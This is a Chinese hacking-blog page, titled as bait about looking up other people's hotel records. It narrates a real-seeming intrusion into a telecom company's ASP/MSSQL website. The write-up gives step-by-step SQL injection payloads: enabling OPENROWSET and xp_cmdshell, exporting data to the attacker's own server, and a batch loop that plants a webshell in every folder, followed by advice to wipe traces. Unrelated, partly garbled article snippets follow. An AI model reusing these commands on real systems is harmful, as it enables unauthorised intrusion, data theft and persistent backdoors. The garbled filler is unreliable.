查询别人的开房记录 如何查询我老公和别人的开房记...

访客4年前黑客工具636

电信级的系统估计都是采用比较大型的数据库了吧~ 而且涉及到高速搜索方面的!出乎我意料之外呢!兰州电信 号码百事通的网站 居然是用IIS ASP!呵呵!ASP估计脚本小子都玩得很熟悉了!-_- 而且ASP不采用FSO生成静态页面技术! 呵呵~其实注入点并不是那么好找的!毕竟是电信的大网站!测试了好多个点都失败,我个人比较喜欢找那些片偏僻的url连接!那些80%的程序员都会疏忽~! OK 来个经典 and 0=0 and 0=1 返回不一样的结果!看来是数字输入的了! 不说太多~ 再看看是什么数据库 跟ASP结合 80% 都是MSSQL了!不过也有例外的~呵呵例如第2代身份证验证的网站 我记得有好几个是采用ASP/ASPX ORACLE 的!题外话就不多说了!来点直接的!
and exists(select @@version)-- 返回正常哦~ 呵呵看来不会是ORACLE其他了 要么就是SYBASE 要么就是 MSSQL
那再来看看 SYBASE 没有IS_SRVROLEMEMBER函数的!只有MS的才会有!而SYBASE判断权限就只有用show_role
and 1=(select IS_SRVROLEMEMBER('sysadmin'))-- 喔? 返回正常哦 , 真大意啊~是SA权限!
OK那么 就来个我的更爱 OPENROWSET
先建一个表 
create table c(dir ntext,num int,f int)--
然后
insert c execute master..xp_dirtree 'c:\',1,1--
insert into OPENROWSET('SQLOLEDB','xxx.xxx.xxx.1';'sa';'p','select * from Northwind.dbo.dirtree')
select * from c--把远程的表导到我自己机器上的MSSQL
发现报告错误
不允许OPENROWSET ~~ 奇怪?? 难道是MSSQL2005?权限问题?靠!那就开呗!幸好是SA权限
EXEC sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--开始分布式事务
现在来真的了!不过还是有我最担心的~ 就是WEB跟DATABASE是分离的!这样搞起来就郁闷了!OK!
既然是SA 那就把他的CMDSHELL都开了吧~
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
这样就可以开启CMDSHELL 但是还没有添加扩展存储过程
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
其实没有什么必要的~只是我为了方便防火墙!
再来执行 exec master..xp_cmdshell 'ping 自己IP' 防火墙检测到有对方IP ping自己了呵呵!然后再ping他的WEBSITE
看来是同一个IP哦~ 哈哈!那就爽了!那我就直接在他本地写一个bat吧!
随便找个地方用xp_cmdshell写了个bat 内容为
FOR /R "C:\" %%v IN (1.asp) DO echo ^^>>%%v
然后用他的xp_cmdshell执行 OK
在C盘下面所有文件夹都有这个1.asp了~ 呵呵 如此类推
把其他盘也感染.... 5分钟过后!~ 他的所有盘 所有文件夹都有这个 1.asp的一句话~ 哈哈!来到www.lanzhouXXXXX.com 在他的web上面传个大马子~KO~~... 记得收拾残局!把之前的垃圾清除~呵呵 

相关文章

大专学什么专业好,就业前景最好的专业推荐

大专学什么专业好,就业前景最好的专业推荐

其实现在只要好就业真的很容易,即便高中毕业的学生,只要不挑,就业还是很容易的!实际上现在很多岗位对于学历都没有太大的要求,只要认字没啥问题,一样也能够就业。 但是大部分这类不需要学历门槛的工作,...

现在学什么技术赚钱(这个完全无需技术的挣钱

现在学什么技术赚钱(这个完全无需技术的挣钱

在互联网上,无论你想要赚多少钱,年入50万也好,100万也罢,我认为有一个项目就足够了。 一个项目的潜力,是由你发掘的深度决定的,每一个小项目都能演变成一个具有超强能力的赚钱项目。 不说复杂的,就...

黑客帝国3结局小女孩创造了什么,黑客双宝来袭找爹地,推特上找中国黑客

被intval处理过了,不能注入从标题要求能够看出,这个试验显着是要杰出社会工程学,所以收集信息便是有必要的了,尽或许的收集! 6在此之后,CredCrack将会持续在方针网络的...

智能快递柜,怎么从政策层面找到机会点?

智能快递柜,怎么从政策层面找到机会点?

疫情期间,智能快递柜成了用户与快递小哥派件取件的首选,那么外部影响下,热度重启的智能快递柜还有什么发展方向与机会点呢?或许我们可以从政策层面找出一些答案。 从今年1月23日,各大平台纷纷推出“无接触...

黑客入侵痕迹可以保存多长时间(黑客入侵违法吗)

黑客入侵痕迹可以保存多长时间(黑客入侵违法吗)

黑客在入侵系统后,一定会留下证据吗? 真正的黑客攻击手机会留下痕迹,不真正的黑客他不会留下痕迹,因为他竟然是黑色,它就是根本就让你找不着他。建立被入侵系统当前完整系统快照,或只保存被修改部分的快照,以...

1微米等于多少丝1微米等于多少丝

1微米等于多少丝   请汇报我精确谜底哈 感谢了哦   1丝(米)=0.1毫米=0.1*1徐贞姬000=100微米=100*1000=100000纳米1 ,000纳米=1微米(μm)1毫米=100...